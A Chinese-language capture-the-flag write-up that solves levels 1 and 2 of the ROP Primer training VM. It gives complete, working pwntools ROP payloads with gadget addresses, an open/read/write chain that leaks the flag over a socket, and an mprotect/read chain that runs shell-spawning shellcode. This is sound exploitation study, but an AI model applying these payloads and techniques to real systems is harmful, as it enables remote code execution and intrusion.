大家好,最近在复习关于Linux Pwn的相关知识。偶然间看到大佬的文章,讲解了关于Rop Primer靶机中 level0 的解题流程,发现此靶机还有 level1 和 level2 两个练习,本着求知若渴的学习态度,研究了一下这两个练习,希望跟大家共同学习提高。
首先,根据题目提示,以账号level1和密码shodan登录靶机,查看到文件flag和level1相关信息。
level1 为动态链接的32位程序,开启了NX保护。
上来直接运行 level 程序,发现一直提示 error bind()ing ,ltrace看一下发现 bind 一直返回 -1,说明地址绑定不成功。
查看一下本地的端口和进程信息,发现8888端口一直处于监听状态,且属于level2用户。
直接nc过去,猜测该端口上运行着一个属于 level2 用户的 level1 程序。
再来看题目本身,通过题目的说明,根据程序源代码找到漏洞点:漏洞产生的原因为对 char filename[32]
执行了以下操作,而变量 filesize
由用户输入,因此会造成溢出。
出题者提示通过 level1 二进制文件中的 open/read/write 函数来拿到flag。顺藤摸瓜,这里很自然想到处理流程为
计算溢出偏移量,通过gdb调试,算得其偏移量为 64 字节
(注:此处如果通过ida查看到 filename 处于 ebp – 0x3c 的位置,推算要控制的 eip 偏移为 0x3c+4=44 个字节,是不准确的。)
继续下面的工作,首先找到 level1 plt 表中的 open/read/write 的地址:
然后,找到 level1 中的 flag字符串:
最后,收集 level1 中的 gadget:
至此,完成rop准备工作,各变量如下:
open_addr = 0x80486d0
read_addr = 0x8048640
write_addr = 0x8048700
flag_addr = 0x8049128
pop3_ret_addr = 0x08048ef6
pop2_ret_addr = 0x08048ef7
buf_addr = 0x0804a000
open/read/write 函数的执行流程如下:
open("flag",0)
read(file_fd,buf_addr,0x80)
write(socket_fd,buf_addr,0x80)
做到这里,小小的困惑了一下,Unix/Linux的一种重要思想就是一切皆文件,而这里的 file_fd 和 socket_fd 数值应该是多少?既然不清楚,那就跟踪调试看一下。这里直接上 strace 工具,从下图可以观察到 file_descriptor 数值为 3 , socket_descriptor 数值为 4 .
接着布局payload如下:
# open("flag",0)
payload = "A"*64
payload += p32(open_addr)
payload += p32(pop2_ret_addr)
payload += p32(flag_addr)
payload += p32(0)
# read(file_fd,buf_addr,0x80)
payload += p32(read_addr)
payload += p32(pop3_ret_addr)
payload += p32(3) # file_fd
payload += p32(buf_addr)
payload += p32(0x80)
# write(socket_fd,buf_addr,0x80)
payload += p32(write_addr)
payload += "BBBB"
payload += p32(4) # socket_fd
payload += p32(buf_addr)
payload += p32(0x80)
最后,通过交互,成功拿到flag。
p = remote("192.168.88.135",8888)
p.recvuntil("> ")
p.sendline("store")
p.recvuntil("> ")
p.sendline(str(len(payload)+1))
p.recvuntil("> ")
p.sendline("payload")
p.recvuntil("> ")
p.sendline(payload)
print p.recvline()
同理,以 level2 和 tryharder 登录靶机,
查看文件信息。level2 为静态链接文件,开了NX保护。
查看题目说明,显然 strcpy 操作会导致变量 name 溢出,gdb调试查看溢出偏移为 44 个字节。
此题需要注意的是,由于是 strcpy 函数,在拷贝时会以 0x00 字节为结束符。这就提示我们,当我们打入的 payload 中间含有 0x00 字符时,其后的 payload 则不会顺利拷贝,从而导致无法正常执行获取shell 。
解题思路:参考大佬的文章中解 level0 的mprotect和read相配合的思想。
注意,由于 0x00 的约束,level0直接调用函数的解题方式无法奏效,因此此题采用系统调用(int 0x80
)的方式来实现第一步和第二步的操作。根据提示,我们可以通过 ropshell网站 来搜索二进制文件内我们所需的gadget。
查看 sys_mprotect 信息
由此,我们要布局的 payload 应完成如下的功能
edx = 0x7
ecx = 0x40
ebx = 0x80ca000
eax = 0x7d
实现 edx=0x7
的思想:在栈上放 0xffffffff,而后 pop edx
,再通过8次 inc edx
即可。
网站查询到所需的gadget如下:
实现 edx=0x7
的payload布局如下:
payload1 += pack(0x0000a476) #pop edx ; ret
payload1 += p32(0xffffffff)
payload1 += pack(0x00006da1) #inc edx; add al, 0x83; ret
payload1 += pack(0x00006da1)
payload1 += pack(0x00006da1)
payload1 += pack(0x00006da1)
payload1 += pack(0x00006da1)
payload1 += pack(0x00006da1)
payload1 += pack(0x00006da1)
payload1 += pack(0x00006da1)
实现 ecx=0x40
的思想同上即可。所需的gadget信息如下:
实现 ecx=0x40
的payload布局如下:
payload1 += pack(0x0000a49d)# pop ecx; pop ebx; ret
payload1 += p32(0xffffffff) # ecx
payload1 += p32(0x80ca001) # 0x804a000+1 -> ebx
payload1 += pack(0x000806db) #inc ecx; ret
payload1 += pack(0x000806db)
payload1 += pack(0x0004fd5a) #add ecx, ecx; ret
payload1 += pack(0x0004fd5a)
payload1 += pack(0x0004fd5a)
payload1 += pack(0x0004fd5a)
payload1 += pack(0x0004fd5a)
payload1 += pack(0x0004fd5a)
为实现ebx = 0x80ca000
的操作,上述gadget已完成 0x80ca001 pop -> ebx ,只需再执行一次下面的gadget即可:
payload1 += pack(0x00007871) #dec ebx; ret
实现 eax=0x7d
同样可利用 pop ; inc ; dec
组合操作实现
payload1 += pack(0x000601d6) #pop eax; ret
payload1 += p32(0xffffffff)
payload1 += pack(0x0002321e) #add eax, ecx; ret
payload1 += pack(0x0002321e)
payload1 += pack(0x000600c6) #dec eax; ret
payload1 += pack(0x000600c6)
至此,通过 int 0x80
即可实现 sys_mprotect 操作。
整体流程同上,首先查看 sys_read 信息,
由此,我们要布局的 payload 应完成如下的功能
edx = 0x01010101 # not 0x00
ecx = 0x80ca000
ebx = 0
eax = 0x3
利用ropshell网站查询所需gadget,整体流程同 0x02章节,在此不再赘述。payload布局如下:
#2-1 edx <- 0x01010101
payload1 += p32(0x08052476) #pop edx ; ret
payload1 += p32(0x01010101)
#2-2 ecx <- 0x080ca000
payload1 += pack(0x0000a49d) # pop ecx; pop ebx; ret
payload1 += p32(0x80ca001)
payload1 += p32(0xffffffff)
payload1 += pack(0x000008e9) # dec ecx; ret
#2-3 ebx <- 0
payload1 += pack(0x000806d1) # inc ebx; ret
#2-4 eax <- 0x3
payload1 += pack(0x000601d6) # pop eax; ret
payload1 += p32(0xffffffff)
payload1 += pack(0x000222ef) # inc eax; ret
payload1 += pack(0x000222ef)
payload1 += pack(0x000222ef)
payload1 += pack(0x000222ef)
payload1 += pack(0x0000aba0) # int 0x80; ret
上述两步执行完成后,读取shellcode存储在 0x80ca000 处,即 sys_read 执行完的 ecx 地址处,因此在 payload 的最后,加上如下gadget即可。
payload1 += pack(0x0005e42c) # jmp ecx
payload 保存到 payload.txt。
shellcode 直接通过 pwntools 的 asm(shellcraft.i386.linux.sh())
直接生成,保存到shellcode.txt。
成功溢出获得shell,拿到flag.
对pwn靶机的练习,回顾了一下rop的几种操作。当然,复杂的情况还有很多,针对具体问题也要具体分析,但总之,掌握了其核心关键的知识要点,复杂的情况只要耐心细致地分析即可。以后会继续给大家带来。
祝大家学习工作顺利,盼和大家共同进步。